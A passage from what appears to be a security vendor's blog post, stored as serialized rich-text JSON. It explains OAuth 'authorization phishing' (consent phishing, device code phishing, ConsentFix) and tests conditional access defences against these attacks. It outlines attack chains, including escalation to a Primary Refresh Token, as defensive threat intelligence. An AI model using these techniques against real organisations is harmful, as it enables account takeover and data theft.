,[],{"data":9175,"content":9176,"nodeType":791},{"uri":2818},[9177],{"data":9178,"marks":9179,"value":2823,"nodeType":699},{},[],{"data":9181,"marks":9182,"value":2827,"nodeType":699},{},[],{"data":9184,"content":9187,"nodeType":1041},{"target":9185},{"sys":9186},{"id":2832,"type":1046,"linkType":1047},[],{"data":9189,"content":9190,"nodeType":695},{},[9191],{"data":9192,"marks":9193,"value":2840,"nodeType":699},{},[],{"data":9195,"content":9198,"nodeType":1041},{"target":9196},{"sys":9197},{"id":2845,"type":1046,"linkType":1047},[],{"data":9200,"content":9201,"nodeType":695},{},[9202],{"data":9203,"marks":9204,"value":2853,"nodeType":699},{},[],{"data":9206,"content":9209,"nodeType":1041},{"target":9207},{"sys":9208},{"id":2858,"type":1046,"linkType":1047},[],{"data":9211,"content":9212,"nodeType":695},{},[9213],{"data":9214,"marks":9215,"value":2866,"nodeType":699},{},[],{"data":9217,"content":9220,"nodeType":1041},{"target":9218},{"sys":9219},{"id":2871,"type":1046,"linkType":1047},[],{"data":9222,"content":9223,"nodeType":769},{},[9224],{"data":9225,"marks":9226,"value":2880,"nodeType":699},{},[9227],{"type":707},{"data":9229,"content":9230,"nodeType":695},{},[9231,9234,9240,9243,9249,9252,9258],{"data":9232,"marks":9233,"value":2887,"nodeType":699},{},[],{"data":9235,"content":9236,"nodeType":791},{"uri":2890},[9237],{"data":9238,"marks":9239,"value":2895,"nodeType":699},{},[],{"data":9241,"marks":9242,"value":2899,"nodeType":699},{},[],{"data":9244,"content":9245,"nodeType":791},{"uri":2902},[9246],{"data":9247,"marks":9248,"value":2907,"nodeType":699},{},[],{"data":9250,"marks":9251,"value":2911,"nodeType":699},{},[],{"data":9253,"content":9254,"nodeType":791},{"uri":2914},[9255],{"data":9256,"marks":9257,"value":2919,"nodeType":699},{},[],{"data":9259,"marks":9260,"value":2923,"nodeType":699},{},[],{"data":9262,"content":9263,"nodeType":695},{},[9264,9267,9273,9276,9282],{"data":9265,"marks":9266,"value":2930,"nodeType":699},{},[],{"data":9268,"content":9269,"nodeType":791},{"uri":2933},[9270],{"data":9271,"marks":9272,"value":2938,"nodeType":699},{},[],{"data":9274,"marks":9275,"value":2942,"nodeType":699},{},[],{"data":9277,"content":9278,"nodeType":791},{"uri":2945},[9279],{"data":9280,"marks":9281,"value":2950,"nodeType":699},{},[],{"data":9283,"marks":9284,"value":2954,"nodeType":699},{},[],{"data":9286,"content":9287,"nodeType":695},{},[9288,9291,9297],{"data":9289,"marks":9290,"value":2961,"nodeType":699},{},[],{"data":9292,"content":9293,"nodeType":791},{"uri":2964},[9294],{"data":9295,"marks":9296,"value":2969,"nodeType":699},{},[],{"data":9298,"marks":9299,"value":2973,"nodeType":699},{},[],{"data":9301,"content":9302,"nodeType":695},{},[9303,9306,9312,9315,9321],{"data":9304,"marks":9305,"value":2980,"nodeType":699},{},[],{"data":9307,"content":9308,"nodeType":791},{"uri":2983},[9309],{"data":9310,"marks":9311,"value":2988,"nodeType":699},{},[],{"data":9313,"marks":9314,"value":2992,"nodeType":699},{},[],{"data":9316,"content":9317,"nodeType":791},{"uri":2995},[9318],{"data":9319,"marks":9320,"value":3000,"nodeType":699},{},[],{"data":9322,"marks":9323,"value":3004,"nodeType":699},{},[],{"data":9325,"content":9326,"nodeType":769},{},[9327],{"data":9328,"marks":9329,"value":3012,"nodeType":699},{},[9330],{"type":707},{"data":9332,"content":9333,"nodeType":695},{},[9334,9337,9343,9346,9352],{"data":9335,"marks":9336,"value":3019,"nodeType":699},{},[],{"data":9338,"content":9339,"nodeType":791},{"uri":3022},[9340],{"data":9341,"marks":9342,"value":3027,"nodeType":699},{},[],{"data":9344,"marks":9345,"value":3031,"nodeType":699},{},[],{"data":9347,"content":9348,"nodeType":791},{"uri":3034},[9349],{"data":9350,"marks":9351,"value":3039,"nodeType":699},{},[],{"data":9353,"marks":9354,"value":3043,"nodeType":699},{},[],{"data":9356,"content":9357,"nodeType":695},{},[9358,9361,9367,9370,9376],{"data":9359,"marks":9360,"value":3050,"nodeType":699},{},[],{"data":9362,"content":9363,"nodeType":791},{"uri":3053},[9364],{"data":9365,"marks":9366,"value":3058,"nodeType":699},{},[],{"data":9368,"marks":9369,"value":3062,"nodeType":699},{},[],{"data":9371,"content":9372,"nodeType":791},{"uri":3065},[9373],{"data":9374,"marks":9375,"value":3070,"nodeType":699},{},[],{"data":9377,"marks":9378,"value":3074,"nodeType":699},{},[],{"data":9380,"content":9381,"nodeType":695},{},[9382,9385,9391,9394,9400],{"data":9383,"marks":9384,"value":3081,"nodeType":699},{},[],{"data":9386,"content":9387,"nodeType":791},{"uri":3084},[9388],{"data":9389,"marks":9390,"value":3089,"nodeType":699},{},[],{"data":9392,"marks":9393,"value":3093,"nodeType":699},{},[],{"data":9395,"content":9396,"nodeType":791},{"uri":3096},[9397],{"data":9398,"marks":9399,"value":3101,"nodeType":699},{},[],{"data":9401,"marks":9402,"value":3105,"nodeType":699},{},[],{"data":9404,"content":9405,"nodeType":769},{},[9406],{"data":9407,"marks":9408,"value":3113,"nodeType":699},{},[9409],{"type":707},{"data":9411,"content":9412,"nodeType":695},{},[9413],{"data":9414,"marks":9415,"value":3120,"nodeType":699},{},[],{"data":9417,"content":9418,"nodeType":695},{},[9419,9422,9428],{"data":9420,"marks":9421,"value":3127,"nodeType":699},{},[],{"data":9423,"content":9424,"nodeType":791},{"uri":3130},[9425],{"data":9426,"marks":9427,"value":3135,"nodeType":699},{},[],{"data":9429,"marks":9430,"value":3139,"nodeType":699},{},[],{"data":9432,"content":9433,"nodeType":695},{},[9434,9437,9443,9446,9452,9455,9461,9464,9470],{"data":9435,"marks":9436,"value":3146,"nodeType":699},{},[],{"data":9438,"content":9439,"nodeType":791},{"uri":3149},[9440],{"data":9441,"marks":9442,"value":3154,"nodeType":699},{},[],{"data":9444,"marks":9445,"value":3158,"nodeType":699},{},[],{"data":9447,"content":9448,"nodeType":791},{"uri":3161},[9449],{"data":9450,"marks":9451,"value":3166,"nodeType":699},{},[],{"data":9453,"marks":9454,"value":3170,"nodeType":699},{},[],{"data":9456,"content":9457,"nodeType":791},{"uri":3173},[9458],{"data":9459,"marks":9460,"value":3178,"nodeType":699},{},[],{"data":9462,"marks":9463,"value":3182,"nodeType":699},{},[],{"data":9465,"content":9466,"nodeType":791},{"uri":3185},[9467],{"data":9468,"marks":9469,"value":3190,"nodeType":699},{},[],{"data":9471,"marks":9472,"value":1407,"nodeType":699},{},[],{"data":9474,"content":9475,"nodeType":695},{},[9476,9479,9485,9488,9494],{"data":9477,"marks":9478,"value":3200,"nodeType":699},{},[],{"data":9480,"content":9481,"nodeType":791},{"uri":3203},[9482],{"data":9483,"marks":9484,"value":3208,"nodeType":699},{},[],{"data":9486,"marks":9487,"value":3212,"nodeType":699},{},[],{"data":9489,"content":9490,"nodeType":791},{"uri":3215},[9491],{"data":9492,"marks":9493,"value":3220,"nodeType":699},{},[],{"data":9495,"marks":9496,"value":3224,"nodeType":699},{},[],{"data":9498,"content":9499,"nodeType":769},{},[9500],{"data":9501,"marks":9502,"value":3232,"nodeType":699},{},[9503],{"type":707},{"data":9505,"content":9506,"nodeType":695},{},[9507,9510,9516],{"data":9508,"marks":9509,"value":3239,"nodeType":699},{},[],{"data":9511,"content":9512,"nodeType":791},{"uri":2577},[9513],{"data":9514,"marks":9515,"value":3246,"nodeType":699},{},[],{"data":9517,"marks":9518,"value":3250,"nodeType":699},{},[],{"data":9520,"content":9521,"nodeType":695},{},[9522,9525,9531,9534,9540,9543,9549],{"data":9523,"marks":9524,"value":3257,"nodeType":699},{},[],{"data":9526,"content":9527,"nodeType":791},{"uri":3260},[9528],{"data":9529,"marks":9530,"value":3265,"nodeType":699},{},[],{"data":9532,"marks":9533,"value":3269,"nodeType":699},{},[],{"data":9535,"content":9536,"nodeType":791},{"uri":3272},[9537],{"data":9538,"marks":9539,"value":3277,"nodeType":699},{},[],{"data":9541,"marks":9542,"value":3281,"nodeType":699},{},[],{"data":9544,"content":9545,"nodeType":791},{"uri":3284},[9546],{"data":9547,"marks":9548,"value":3289,"nodeType":699},{},[],{"data":9550,"marks":9551,"value":3293,"nodeType":699},{},[],{"data":9553,"content":9554,"nodeType":721},{},[],{"data":9556,"content":9557,"nodeType":725},{},[9558],{"data":9559,"marks":9560,"value":3304,"nodeType":699},{},[9561],{"type":707},{"data":9563,"content":9564,"nodeType":695},{},[9565],{"data":9566,"marks":9567,"value":3311,"nodeType":699},{},[],{"data":9569,"content":9570,"nodeType":695},{},[9571],{"data":9572,"marks":9573,"value":3318,"nodeType":699},{},[],{"data":9575,"content":9576,"nodeType":695},{},[9577,9580,9586],{"data":9578,"marks":9579,"value":3325,"nodeType":699},{},[],{"data":9581,"content":9582,"nodeType":791},{"uri":3328},[9583],{"data":9584,"marks":9585,"value":3333,"nodeType":699},{},[],{"data":9587,"marks":9588,"value":21,"nodeType":699},{},[],{"data":9590,"content":9593,"nodeType":1041},{"target":9591},{"sys":9592},{"id":3341,"type":1046,"linkType":1047},[],{"data":9595,"content":9596,"nodeType":695},{},[9597],{"data":9598,"marks":9599,"value":3349,"nodeType":699},{},[],{"data":9601,"content":9602,"nodeType":1589},{},[9603,9621,9639,9658,9676],{"data":9604,"content":9605,"nodeType":1593},{},[9606],{"data":9607,"content":9608,"nodeType":695},{},[9609,9612,9618],{"data":9610,"marks":9611,"value":3362,"nodeType":699},{},[],{"data":9613,"content":9614,"nodeType":791},{"uri":3365},[9615],{"data":9616,"marks":9617,"value":3370,"nodeType":699},{},[],{"data":9619,"marks":9620,"value":3374,"nodeType":699},{},[],{"data":9622,"content":9623,"nodeType":1593},{},[9624],{"data":9625,"content":9626,"nodeType":695},{},[9627,9630,9636],{"data":9628,"marks":9629,"value":3384,"nodeType":699},{},[],{"data":9631,"content":9632,"nodeType":791},{"uri":2774},[9633],{"data":9634,"marks":9635,"value":3391,"nodeType":699},{},[],{"data":9637,"marks":9638,"value":3395,"nodeType":699},{},[],{"data":9640,"content":9641,"nodeType":1593},{},[9642],{"data":9643,"content":9644,"nodeType":695},{},[9645,9648,9655],{"data":9646,"marks":9647,"value":21,"nodeType":699},{},[],{"data":9649,"content":9650,"nodeType":791},{"uri":3407},[9651],{"data":9652,"marks":9653,"value":3413,"nodeType":699},{},[9654],{"type":799},{"data":9656,"marks":9657,"value":3417,"nodeType":699},{},[],{"data":9659,"content":9660,"nodeType":1593},{},[9661],{"data":9662,"content":9663,"nodeType":695},{},[9664,9667,9673],{"data":9665,"marks":9666,"value":3427,"nodeType":699},{},[],{"data":9668,"content":9669,"nodeType":791},{"uri":3430},[9670],{"data":9671,"marks":9672,"value":3435,"nodeType":699},{},[],{"data":9674,"marks":9675,"value":3439,"nodeType":699},{},[],{"data":9677,"content":9678,"nodeType":1593},{},[9679],{"data":9680,"content":9681,"nodeType":695},{},[9682,9685,9691],{"data":9683,"marks":9684,"value":3449,"nodeType":699},{},[],{"data":9686,"content":9687,"nodeType":791},{"uri":3452},[9688],{"data":9689,"marks":9690,"value":3457,"nodeType":699},{},[],{"data":9692,"marks":9693,"value":3461,"nodeType":699},{},[],{"data":9695,"content":9696,"nodeType":695},{},[9697,9700,9706,9709,9715,9718,9724],{"data":9698,"marks":9699,"value":3468,"nodeType":699},{},[],{"data":9701,"content":9702,"nodeType":791},{"uri":3471},[9703],{"data":9704,"marks":9705,"value":3476,"nodeType":699},{},[],{"data":9707,"marks":9708,"value":3480,"nodeType":699},{},[],{"data":9710,"content":9711,"nodeType":791},{"uri":1259},[9712],{"data":9713,"marks":9714,"value":3487,"nodeType":699},{},[],{"data":9716,"marks":9717,"value":3491,"nodeType":699},{},[],{"data":9719,"content":9720,"nodeType":791},{"uri":3494},[9721],{"data":9722,"marks":9723,"value":3499,"nodeType":699},{},[],{"data":9725,"marks":9726,"value":3503,"nodeType":699},{},[],{"data":9728,"content":9729,"nodeType":769},{},[9730],{"data":9731,"marks":9732,"value":3511,"nodeType":699},{},[9733],{"type":707},{"data":9735,"content":9736,"nodeType":695},{},[9737,9740,9746],{"data":9738,"marks":9739,"value":3518,"nodeType":699},{},[],{"data":9741,"content":9742,"nodeType":791},{"uri":3521},[9743],{"data":9744,"marks":9745,"value":3526,"nodeType":699},{},[],{"data":9747,"marks":9748,"value":3530,"nodeType":699},{},[],{"data":9750,"content":9751,"nodeType":695},{},[9752],{"data":9753,"marks":9754,"value":3537,"nodeType":699},{},[],{"data":9756,"content":9757,"nodeType":721},{},[],{"data":9759,"content":9760,"nodeType":725},{},[9761],{"data":9762,"marks":9763,"value":3548,"nodeType":699},{},[9764],{"type":707},{"data":9766,"content":9767,"nodeType":695},{},[9768],{"data":9769,"marks":9770,"value":3555,"nodeType":699},{},[],{"data":9772,"content":9773,"nodeType":1589},{},[9774,9783,9792,9801],{"data":9775,"content":9776,"nodeType":1593},{},[9777],{"data":9778,"content":9779,"nodeType":695},{},[9780],{"data":9781,"marks":9782,"value":3568,"nodeType":699},{},[],{"data":9784,"content":9785,"nodeType":1593},{},[9786],{"data":9787,"content":9788,"nodeType":695},{},[9789],{"data":9790,"marks":9791,"value":3578,"nodeType":699},{},[],{"data":9793,"content":9794,"nodeType":1593},{},[9795],{"data":9796,"content":9797,"nodeType":695},{},[9798],{"data":9799,"marks":9800,"value":3588,"nodeType":699},{},[],{"data":9802,"content":9803,"nodeType":1593},{},[9804],{"data":9805,"content":9806,"nodeType":695},{},[9807],{"data":9808,"marks":9809,"value":3598,"nodeType":699},{},[],{"data":9811,"content":9812,"nodeType":695},{},[9813],{"data":9814,"marks":9815,"value":3605,"nodeType":699},{},[],{"data":9817,"content":9818,"nodeType":721},{},[],{"data":9820,"content":9821,"nodeType":695},{},[9822],{"data":9823,"marks":9824,"value":909,"nodeType":699},{},[],{"data":9826,"content":9827,"nodeType":695},{},[9828],{"data":9829,"marks":9830,"value":916,"nodeType":699},{},[],{"data":9832,"content":9833,"nodeType":695},{},[9834,9837,9844],{"data":9835,"marks":9836,"value":21,"nodeType":699},{},[],{"data":9838,"content":9839,"nodeType":791},{"uri":3629},[9840],{"data":9841,"marks":9842,"value":930,"nodeType":699},{},[9843],{"type":799},{"data":9845,"marks":9846,"value":21,"nodeType":699},{},[],{"items":9848},[9849,9851],{"sys":9850,"name":1833},{"id":1832},{"sys":9852,"name":1837},{"id":1836},{"items":9854},[9855],{"fullName":1841,"firstName":1842,"jobTitle":1843,"profilePicture":9856},{"url":1845},{"__typename":952,"sys":9858,"content":9860,"title":10492,"synopsis":10493,"hashTags":60,"publishedDate":10494,"slug":10495,"tagsCollection":10496,"authorsCollection":10502},{"id":9859},"1m3Hh9Gg9aHXFckcnlDi4V",{"json":9861},{"nodeType":691,"data":9862,"content":9863},{},[9864,9871,9878,9895,9913,9937,9965,9971,9974,9982,9989,9996,10002,10010,10021,10040,10046,10054,10087,10093,10100,10107,10115,10126,10144,10162,10165,10173,10180,10187,10195,10202,10218,10230,10242,10249,10261,10268,10275,10281,10289,10296,10303,10306,10314,10321,10328,10334,10358,10375,10393,10399,10402,10410,10422,10434,10446,10453,10461],{"nodeType":695,"data":9865,"content":9866},{},[9867],{"nodeType":699,"value":9868,"marks":9869,"data":9870},"For most of phishing's history, the objective was simple: steal the credential. Whether through a fake login page twenty years ago or through an attacker in the middle (AiTM) reverse proxy today, the entire attack chain has been oriented around defeating authentication. So defenders have focused on making the login harder to compromise.",[],{},{"nodeType":695,"data":9872,"content":9873},{},[9874],{"nodeType":699,"value":9875,"marks":9876,"data":9877},"This investment is starting to pay off. While MFA as a blanket control is routinely defeated by AiTM attacks (the default phishing method today), phishing-resistant passkeys are used in a relatively small number of logins, but growing steadily each year. And core identity platforms are taking steps to make them the default method. For example, Microsoft is making passkeys the default sign-in method for Entra ID from September 2026, and users stuck on SMS or voice authentication will be force-migrated. ",[],{},{"nodeType":695,"data":9879,"content":9880},{},[9881,9885,9891],{"nodeType":699,"value":9882,"marks":9883,"data":9884},"AiTM phishing kits remain dominant, but the detection surface is improving — behavioral detections now catch the kit's page behavior regardless of the domain it's hosted on. Authentication controls are genuinely getting harder to beat (though even with passkeys, not impossible, as shown in ",[],{},{"nodeType":791,"data":9886,"content":9887},{"uri":2995},[9888],{"nodeType":699,"value":1137,"marks":9889,"data":9890},[],{},{"nodeType":699,"value":9892,"marks":9893,"data":9894}," — shown in the video below).",[],{},{"nodeType":695,"data":9896,"content":9897},{},[9898,9902,9909],{"nodeType":699,"value":9899,"marks":9900,"data":9901},"So it makes sense that attackers are looking for alternatives. In 2026, we’ve seen ",[],{},{"nodeType":791,"data":9903,"content":9904},{"uri":1355},[9905],{"nodeType":699,"value":2570,"marks":9906,"data":9908},[9907],{"type":799},{},{"nodeType":699,"value":9910,"marks":9911,"data":9912}," explode into mainstream adoption, with 30+ distinct kits now offering the technique (this number jumps every time we write a new update). ",[],{},{"nodeType":695,"data":9914,"content":9915},{},[9916,9920,9925,9929,9933],{"nodeType":699,"value":9917,"marks":9918,"data":9919},"Device code phishing sees the attacker target the authorization layer instead — OAuth consent flows that operate ",[],{},{"nodeType":699,"value":9921,"marks":9922,"data":9924},"after",[9923],{"type":970},{},{"nodeType":699,"value":9926,"marks":9927,"data":9928}," authentication has already succeeded. We're calling this class of attack ",[],{},{"nodeType":699,"value":1305,"marks":9930,"data":9932},[9931],{"type":707},{},{"nodeType":699,"value":9934,"marks":9935,"data":9936},", and it represents a structural shift in how identity attacks work.",[],{},{"nodeType":695,"data":9938,"content":9939},{},[9940,9944,9951,9955,9961],{"nodeType":699,"value":9941,"marks":9942,"data":9943},"But device code phishing is one technique in a broader shift. ConsentFix, ",[],{},{"nodeType":791,"data":9945,"content":9946},{"uri":1388},[9947],{"nodeType":699,"value":9948,"marks":9949,"data":9950},"first discovered by Push in December 2025",[],{},{"nodeType":699,"value":9952,"marks":9953,"data":9954},", has already been ",[],{},{"nodeType":791,"data":9956,"content":9957},{"uri":1400},[9958],{"nodeType":699,"value":1403,"marks":9959,"data":9960},[],{},{"nodeType":699,"value":9962,"marks":9963,"data":9964},". ",[],{},{"nodeType":1041,"data":9966,"content":9970},{"target":9967},{"sys":9968},{"id":9969,"type":1046,"linkType":1047},"3tRYNcUvN7KeFqzaGb2Cmn",[],{"nodeType":721,"data":9972,"content":9973},{},[],{"nodeType":725,"data":9975,"content":9976},{},[9977],{"nodeType":699,"value":9978,"marks":9979,"data":9981},"Authentication phishing vs. authorization phishing",[9980],{"type":707},{},{"nodeType":695,"data":9983,"content":9984},{},[9985],{"nodeType":699,"value":9986,"marks":9987,"data":9988},"Authentication phishing targets the login — the moment a user proves their identity. AiTM reverse-proxy kits like Tycoon2FA and Sneaky2FA relay credentials and session tokens in real time, effectively defeating MFA by capturing the authenticated session as it's created. This has been the dominant phishing technique since roughly 2023, and it remains the most common attack we come up against in the wild.",[],{},{"nodeType":695,"data":9990,"content":9991},{},[9992],{"nodeType":699,"value":9993,"marks":9994,"data":9995},"Authorization phishing targets what happens after the login. Instead of stealing a session from the authentication flow, these attacks abuse OAuth authorization mechanisms — consent grants, device code flows, and token exchanges. The attacker never touches the authentication flow at all.",[],{},{"nodeType":1041,"data":9997,"content":10001},{"target":9998},{"sys":9999},{"id":10000,"type":1046,"linkType":1047},"3ADEkZ8KQKs4ndH1T7PdaX",[],{"nodeType":769,"data":10003,"content":10004},{},[10005],{"nodeType":699,"value":10006,"marks":10007,"data":10009},"Consent phishing: the classic OAuth attack",[10008],{"type":707},{},{"nodeType":695,"data":10011,"content":10012},{},[10013,10017],{"nodeType":699,"value":265,"marks":10014,"data":10016},[10015],{"type":707},{},{"nodeType":699,"value":10018,"marks":10019,"data":10020}," is the oldest of the three, and the classic OAuth attack. The attacker creates a malicious third-party application and tricks the user into granting it permissions via an OAuth consent prompt. The app then uses those permissions to access the user's data via API.",[],{},{"nodeType":695,"data":10022,"content":10023},{},[10024,10028,10036],{"nodeType":699,"value":10025,"marks":10026,"data":10027},"Identity providers have substantially hardened their default configurations against consent phishing. Most platforms today do not allow users to consent to apps that have not already been admin-consented into the tenant. For example, ",[],{},{"nodeType":791,"data":10029,"content":10031},{"uri":10030},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fhow-consent-phishing-is-evolving\u002F",[10032],{"nodeType":699,"value":10033,"marks":10034,"data":10035},"Microsoft now blocks unverified third-party app consent by default",[],{},{"nodeType":699,"value":10037,"marks":10038,"data":10039},", as does Google, and GitHub restricts OAuth apps to org-owner approval. ",[],{},{"nodeType":1041,"data":10041,"content":10045},{"target":10042},{"sys":10043},{"id":10044,"type":1046,"linkType":1047},"1KJGoZABIAsuXG5QjBVWOY",[],{"nodeType":769,"data":10047,"content":10048},{},[10049],{"nodeType":699,"value":10050,"marks":10051,"data":10053},"Device code phishing: the breakout threat of 2026",[10052],{"type":707},{},{"nodeType":695,"data":10055,"content":10056},{},[10057,10061,10065,10072,10076,10083],{"nodeType":699,"value":260,"marks":10058,"data":10060},[10059],{"type":707},{},{"nodeType":699,"value":10062,"marks":10063,"data":10064}," targets a different OAuth flow entirely: the ",[],{},{"nodeType":791,"data":10066,"content":10067},{"uri":2818},[10068],{"nodeType":699,"value":10069,"marks":10070,"data":10071},"RFC 8628 device authorization grant",[],{},{"nodeType":699,"value":10073,"marks":10074,"data":10075},", originally designed for input-constrained devices like smart TVs and IoT hardware. The attacker generates a code, delivers it to the victim via a phishing page that auto-polls for a fresh code on page load (which can arrive over email, Teams messages, LinkedIn DMs, voice calls, malvertising, or compromised websites), and the victim enters the code on the real device code for the target app. In the wild this is usually Microsoft, but last year's ",[],{},{"nodeType":791,"data":10077,"content":10078},{"uri":1030},[10079],{"nodeType":699,"value":10080,"marks":10081,"data":10082},"ShinyHunters",[],{},{"nodeType":699,"value":10084,"marks":10085,"data":10086}," campaign saw Salesforce targeted too.",[],{},{"nodeType":1041,"data":10088,"content":10092},{"target":10089},{"sys":10090},{"id":10091,"type":1046,"linkType":1047},"79aVRaPAuAaiNZvTspbmHK",[],{"nodeType":695,"data":10094,"content":10095},{},[10096],{"nodeType":699,"value":10097,"marks":10098,"data":10099},"This grants the attacker an access token scoped to whichever application was targeted, and critically, because device code phishing targets apps that are already consented in the user's tenant (usually first-party Microsoft apps), it sidesteps the consent restrictions that have made traditional consent phishing harder. ",[],{},{"nodeType":695,"data":10101,"content":10102},{},[10103],{"nodeType":699,"value":10104,"marks":10105,"data":10106},"In Microsoft environments, the impact can extend beyond API access — if the attacker targets the Microsoft Authentication Broker, they can register a virtual device against the victim's account and escalate to a full Primary Refresh Token, gaining an interactive SSO-enabled session that can laterally move across any SSO-joined application.",[],{},{"nodeType":769,"data":10108,"content":10109},{},[10110],{"nodeType":699,"value":10111,"marks":10112,"data":10114},"ConsentFix: the new ClickFix-OAuth hybrid",[10113],{"type":707},{},{"nodeType":695,"data":10116,"content":10117},{},[10118,10122],{"nodeType":699,"value":1378,"marks":10119,"data":10121},[10120],{"type":707},{},{"nodeType":699,"value":10123,"marks":10124,"data":10125}," occupies an interesting middle ground. It targets the same OAuth flow as consent phishing — the authorization code grant (RFC 6749) — but it targets pre-approved first-party apps rather than attacker-created third-party apps, which means the consent restrictions that shut down traditional consent phishing don't apply.",[],{},{"nodeType":695,"data":10127,"content":10128},{},[10129,10132,10140],{"nodeType":699,"value":21,"marks":10130,"data":10131},[],{},{"nodeType":791,"data":10133,"content":10134},{"uri":1388},[10135],{"nodeType":699,"value":10136,"marks":10137,"data":10139},"First observed in Russia-linked APT29 campaigns in late 2025",[10138],{"type":799},{},{"nodeType":699,"value":10141,"marks":10142,"data":10143},", the original attacks appeared on compromised websites and were tightly targeted — the attack only activated for specific email domains, allowing non-targets to use the site as normal. ConsentFix combines ClickFix-style clipboard injection with OAuth consent abuse, exploiting apps that use a localhost redirect URI as part of the handshake to capture authorization codes that are usually picked up by a server-side callback.",[],{},{"nodeType":695,"data":10145,"content":10146},{},[10147,10151,10158],{"nodeType":699,"value":10148,"marks":10149,"data":10150},"Push detected and blocked ConsentFix the first time it was seen in the wild, and within months of disclosure, a ",[],{},{"nodeType":791,"data":10152,"content":10153},{"uri":1400},[10154],{"nodeType":699,"value":10155,"marks":10156,"data":10157},"criminal ConsentFix toolkit",[],{},{"nodeType":699,"value":10159,"marks":10160,"data":10161}," appeared on the XSS forum, making the technique more widely available.",[],{},{"nodeType":721,"data":10163,"content":10164},{},[],{"nodeType":725,"data":10166,"content":10167},{},[10168],{"nodeType":699,"value":10169,"marks":10170,"data":10172},"What defenders think works (and what actually does)",[10171],{"type":707},{},{"nodeType":695,"data":10174,"content":10175},{},[10176],{"nodeType":699,"value":10177,"marks":10178,"data":10179},"As we've already established, authentication controls like passkeys have no impact on these attacks, which can come as a surprise for those that have bought into the \"phishing-resistant\" tag of passkeys at face value. That isn't to diminish their value, the passkey isn't phished in this scenario, it's just being circumvented.",[],{},{"nodeType":695,"data":10181,"content":10182},{},[10183],{"nodeType":699,"value":10184,"marks":10185,"data":10186},"Passkeys remain the strongest available protection against AiTM and credential theft. But they address a different layer of the problem, and treating them as a complete answer to phishing creates a dangerous blind spot as attackers shift to authorization-layer techniques.",[],{},{"nodeType":769,"data":10188,"content":10189},{},[10190],{"nodeType":699,"value":10191,"marks":10192,"data":10194},"Evaluating post-authentication controls like Conditional Access Policies",[10193],{"type":707},{},{"nodeType":695,"data":10196,"content":10197},{},[10198],{"nodeType":699,"value":10199,"marks":10200,"data":10201},"Conditional access policies are the primary layer of defense cited against these authorization-layer attacks. We tested the most cited conditional access controls against both device code phishing and ConsentFix, and the results vary significantly.",[],{},{"nodeType":695,"data":10203,"content":10204},{},[10205,10209,10214],{"nodeType":699,"value":10206,"marks":10207,"data":10208},"Since the policy for ",[],{},{"nodeType":699,"value":10210,"marks":10211,"data":10213},"require phishing-resistant authentication",[10212],{"type":707},{},{"nodeType":699,"value":10215,"marks":10216,"data":10217}," pertains to the enforcement of passkey-based logins, this has no impact here as we discussed above.",[],{},{"nodeType":695,"data":10219,"content":10220},{},[10221,10226],{"nodeType":699,"value":10222,"marks":10223,"data":10225},"Block device code flow",[10224],{"type":707},{},{"nodeType":699,"value":10227,"marks":10228,"data":10229}," is the most direct control, and it works — but only against device code phishing, not ConsentFix. It also blocks legitimate device code use cases (Azure CLI, conference room hardware, developer tooling), so organizations with real device code dependencies need per-user group or per-app exceptions that create potential gaps.",[],{},{"nodeType":695,"data":10231,"content":10232},{},[10233,10238],{"nodeType":699,"value":10234,"marks":10235,"data":10237},"Require compliant device",[10236],{"type":707},{},{"nodeType":699,"value":10239,"marks":10240,"data":10241}," is the most effective broad control. Device code flows can't present the TPM-bound proof-of-possession that device compliance requires, so they're blocked outright. However, as above, if you have legitimate uses for device code logins in your environment, you’d need to implement exceptions to this policy. ",[],{},{"nodeType":695,"data":10243,"content":10244},{},[10245],{"nodeType":699,"value":10246,"marks":10247,"data":10248},"ConsentFix, on the other hand, passes through this check. BYOD scenarios also create gaps — personal devices authenticating via browser without a Primary Refresh Token won't satisfy the compliance requirement either, for legitimate and malicious flows alike.",[],{},{"nodeType":695,"data":10250,"content":10251},{},[10252,10257],{"nodeType":699,"value":10253,"marks":10254,"data":10256},"Token protection",[10255],{"type":707},{},{"nodeType":699,"value":10258,"marks":10259,"data":10260},", currently in preview, binds refresh tokens to the device's TPM. It performed better in testing than expected for some ConsentFix scenarios — depending on the scopes requested and the target app — but it doesn't apply to all apps and resources.",[],{},{"nodeType":695,"data":10262,"content":10263},{},[10264],{"nodeType":699,"value":10265,"marks":10266,"data":10267},"Conditional access can be tricky to manage, however, particularly for larger organizations. User groups need maintaining, new apps need scoping, exceptions accumulate, and policies interact in ways that aren't always obvious from the admin console. It's easy to accidentally leave policies in report-only mode (I found this myself during testing) or create exceptions for specific apps that inadvertently open the authorization attack surface. And ticking the box doesn't tell you whether it works in practice.",[],{},{"nodeType":695,"data":10269,"content":10270},{},[10271],{"nodeType":699,"value":10272,"marks":10273,"data":10274},"Microsoft is taking additional steps to reduce the attack surface here — device code flow is blocked by default in new tenants, and they appear to be locking down apps and reply URLs to reduce the ConsentFix attack surface, including adding explicit \"this might be a phishing attack\" warnings on certain reply URLs used in ConsentFix scenarios. But the gap between a default deployment and a hardened one remains wide.",[],{},{"nodeType":1041,"data":10276,"content":10280},{"target":10277},{"sys":10278},{"id":10279,"type":1046,"linkType":1047},"3FguCE9HzDsj94TgRzZSk6",[],{"nodeType":769,"data":10282,"content":10283},{},[10284],{"nodeType":699,"value":10285,"marks":10286,"data":10288},"What about blocking the apps themselves?",[10287],{"type":707},{},{"nodeType":695,"data":10290,"content":10291},{},[10292],{"nodeType":699,"value":10293,"marks":10294,"data":10295},"The challenge is that the apps being abused aren't malicious — they're legitimate first-party Microsoft applications like Azure CLI, Microsoft Office, and Teams. They exist in every Entra tenant by default, are pre-consented with broad permissions, and can't simply be removed.",[],{},{"nodeType":695,"data":10297,"content":10298},{},[10299],{"nodeType":699,"value":10300,"marks":10301,"data":10302},"An admin can toggle \"assignment required\" on a service principal and restrict which users can authenticate through that app, but that means pre-creating and managing user assignments for every first-party app that could be targeted. Over-restricting broadly used apps like Teams or Office may break core workflows.",[],{},{"nodeType":721,"data":10304,"content":10305},{},[],{"nodeType":725,"data":10307,"content":10308},{},[10309],{"nodeType":699,"value":10310,"marks":10311,"data":10313},"The future of authorization phishing",[10312],{"type":707},{},{"nodeType":695,"data":10315,"content":10316},{},[10317],{"nodeType":699,"value":10318,"marks":10319,"data":10320},"Several developments will determine how fast this category matures. Device code phishing is a core technique now, supported by most PhaaS vendors and bolted onto AiTM kits. ConsentFix criminal adoption is still early but could follow suit at any time. ",[],{},{"nodeType":695,"data":10322,"content":10323},{},[10324],{"nodeType":699,"value":10325,"marks":10326,"data":10327},"Non-Microsoft targets 